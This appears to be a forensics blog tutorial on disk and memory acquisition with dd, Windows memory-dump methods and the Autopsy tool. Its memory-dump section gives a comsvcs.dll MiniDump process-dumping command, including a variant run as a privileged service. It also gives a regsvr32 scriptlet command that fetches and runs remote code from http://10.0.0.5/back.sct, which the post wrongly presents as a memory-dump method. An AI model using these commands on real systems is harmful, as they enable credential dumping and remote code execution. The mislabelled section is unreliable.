Forensics Data Acquisition: disk and memory dumping

One challenge you have when collecting data from a system is that some of the data is more volatile than others. That means that certain data will be stored on the system for an extended period of time, while other pieces of data may only be here for a few moments. This is why choosing of correct method of Data Acquisition is very important.

Data that is very volatile is data that’s in your CPU. So things like your CPU registers or CPU cache should be the very first thing you gather. Secondly, would be information that would be around for a little bit longer than CPU information, but not much longer. Things like router tables, ARP cache, process tables, and information and memory will probably be the second most volatile. And so on.

We want to gather as much as we can from the memory because some of this information is never written to a storage drive. Things like your browsing history, clipboard information, encryption keys, or your command history may be found in memory but may not show up on the storage drive itself.

Let’s have a look at some interesting tools which may help us to make forensics process easy and much more automated. Please follow my forensics posts as well.

dd

DD allows you to create a bit-by-bit copy of all of the information that may be on a drive or in a directory. This can obviously be very useful if you need to capture this information in order to perform additional analysis later.

Read from /dev/urandom, 2*512 Bytes, and put it into /tmp/test.txt

dd if=/dev/urandom of=/tmp/test.txt count=2 bs=512

Watch the progress:

dd if=/dev/zero of=/dev/null bs=4KB &
export dd_pid=`pgrep '^dd'`
while [[ -d /proc/$dd_pid ]]; do
    kill -USR1 $dd_pid && sleep 1
    clear
done

Watch the progress of dd with the built-in progress functionality, –
introduced in CoreUtils v8.24:

dd if=/dev/zero of=/dev/null bs=128M status=progress

Clone a drive to another drive with 4 MiB block and ignore error:

dd if=/dev/source_drive of=/dev/dest_drive bs=4194304 conv=noerror

Generate a system backup into an IMG file:

dd if=/dev/drive_device of=path/to/file.img

Restore a drive from an IMG file:

dd if=path/to/file.img of=/dev/drive_device

Memory dump

– Using Powershell or CMD:

Powershell -c rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump [process ID of process.exe] dump.bin full

– Administrative users can use the Windows Service Control to create a service that runs our command:

sc create test binpath=”rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump [process ID of process.exe] dump.bin full”

sc privs test SeDebugPrivilege

sc start test

– Win32dd / Win64dd. Open Windows cmd as Administrator

C:\> win32dd.exe /f E:\mem.img 

– Use Regsvr32 with scriptlet:

<?XML version="1.0"?>
<scriptlet>
<registration
  progid="TESTING"
  classid="{A1112221-0000-0000-3000-000DA00DABFC}" >
  <script language="JScript">
    <![CDATA[
      var foo = new ActiveXObject("WScript.Shell").Run("calc.exe"); 
    ]]>
</script>
</registration>
</scriptlet>

regsvr32.exe /s /i:http://10.0.0.5/back.sct scrobj.dll

Add. system binary proxy execution

– Use Volatility™ WinPmem and imagecopy. More information is here

Data Acquisition with Autopsy

Autopsy is an open-source tool that is used to perform forensic operations on the disk image of the evidence. The forensic investigation that is carried out on the disk image is displayed here. The results obtained here are of help to investigate and locate relevant information. This tool is used by law enforcement agencies, local police and can also be used in the corporates to investigate the evidence found in a computer crime. It can likewise be utilized to recuperate information that has been erased.

Autopsy lets us use a various types of data source:

• Disk Image or VM file:  This includes the image file which can be an exact copy of a hard drive, media card, or even a virtual machine.
• Local Disk: This option includes devices like Hard disk, Pen drives, memory cards, etc.
• Logical Files: It includes the image of any local folders or files.
• Unallocated Space Image File: They include files that do not contain any file system and run with the help of the ingest module.
• Autopsy Logical Imager Results: They include the data source from running the logical imager.
• XRY Text Export: This includes the data source from exporting text files from XRY

Next, you will be prompted to Configure the Ingest Module.

One of the most important properties of Autopsy is the possibility to add your own personalized Ingest Modules either in Java or Python.

All of extracted data group by a category:

• EXIF Metadata: It contains all the .jpg images that have EXIF Metadata associated with them, this Metadata can be analyzed further.
• Encryption Detection: It detects files that are password protected/ encrypted.
• Extension Mismatch Detection: As explained above, it Identifies the files whose extensions do not match their MIME types and thus they may be suspicious.
• Installed Programs:  It gives details about the software used by the user. This information is extracted with the help of the Software Registry hive.
• Operating System Information: It gives information about the OS with the help of the Windows Registry hive and the Software Registry hive.
• Operating System User Account:  It lists information about all the user accounts, for example, accounts belonging to the device are extracted from the Software Hive and the accounts associated with the Internet Explorer using index.data files.
• Recent documents: Lists all the documents that were accessed nearby the time the disk image was captured.
• Recycle Bin: Files that are temporarily stored on the system before being permanently deleted are visible here.
• Remote Drive: Shows information about all the remote drives accessed using the system.
• Shell bags: A shell bag is a set of registry keys that stores details about a folder being viewed, such as its position, icon, and size. All the Shell bags from the system can be viewed here.
• USB Device attached: All the information about the external devices attached to the system is displayed here. This data is extracted from Windows Registry which is actually a maintained database about all the activities taking place on the system.
• Web Cookies: Cookies saves the user information from the sites and thus provide a lot of information about the user’s online activities.
• Web History: All the details about the browser history is shown here.
• Web Searches: Details about the web searches made are displayed here.
• Keyword Hits:  Here specific keywords can be looked for in the image of the disk. Multiple data sources can be selected for the lookup. The search can be restricted to Exact match, Substring match and Regular expression,  for example, emails/ IP Addresses, etc.

Be an ethical, save your privacy!